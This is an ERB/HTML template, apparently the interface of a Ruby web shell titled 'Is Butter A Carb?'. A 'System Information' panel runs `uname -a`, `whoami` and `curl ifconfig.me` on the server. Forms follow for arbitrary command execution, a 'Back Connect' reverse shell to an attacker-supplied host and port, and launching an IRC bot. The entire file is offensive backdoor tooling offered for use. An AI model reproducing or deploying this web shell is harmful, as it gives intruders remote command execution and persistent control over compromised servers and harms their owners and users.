<style>
body
{
	background-image: url('food.png');
	color: #ff69b4;
}

input[type="text"]
{
	border-style: dotted;
	border-color: #ff69b4;
	background-color: transparent;
	color: #000;
	font-weight: bolder;
}

textarea
{
	border-style: dashed;
	border-color: #000;
	background-color: transparent;
	color: #ff69b4;
}
fieldset
{
	border-style: dashed;
	border-color: #000;
	font-weight: bolder;
}
fieldset p
{
	font-weight: normal;
}
</style>
<h1>Is Butter A Carb?</h1>
<fieldset>
	<legend>System Information</legend>
	<p>Uname: <%= `uname -a` %></p>
	<p>User: <%= `whoami` %></p>
	<p>External IP: <%= `curl ifconfig.me` %></p>
</fieldset>
<div style="float:left">
	<div style="float:left">
		<form action="/" method="post">
			<fieldset>
				<legend>Command Execution</legend>
				<input type="text" name="command" placeholder="Enter Your Command">
				<input type="submit">
			</fieldset>
		</form>
		<% if @carb %>
			<textarea readonly name="carb" cols=80 rows=20><%= @carb %></textarea><br>
		<% end %>
	</div>
	<div style="float:right">
		<form action="/backconnect" method="post">
			<fieldset>
				<legend>Back Connect</legend>
				<input type="text" name="host" placeholder="Enter host or IP address">
				<br /><br />
				<input type="text" name="port" placeholder="Enter your listening port">
				<br />
				<input type="submit">
			</fieldset>
		</form>
	</div>
  <div style="float:right">
    <form action="/bawt" method="post">
      <fieldset>
        <legend>Launch IRC Bawt</legend>
        <input type="submit">
      </fieldset>
    </form>
  </div>
</div>
<div style="clear:both"></div>
<img src="http://25.media.tumblr.com/tumblr_me2x8dPttA1rm2lheo1_500.gif" style="float:left"/>
